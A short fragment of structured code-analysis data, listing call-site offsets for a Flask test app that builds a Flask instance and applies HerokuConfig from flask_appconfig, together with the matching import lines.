] | [((102, 118), 'flask.Flask', 'Flask', (['"""testapp"""'], {}), "('testapp')\n", (107, 118), False, 'from flask import Flask\n'), ((123, 140), 'flask_appconfig.HerokuConfig', 'HerokuConfig', (['app'], {}), '(app)\n', (135, 140), False, 'from flask_appconfig import HerokuConfig\n')] |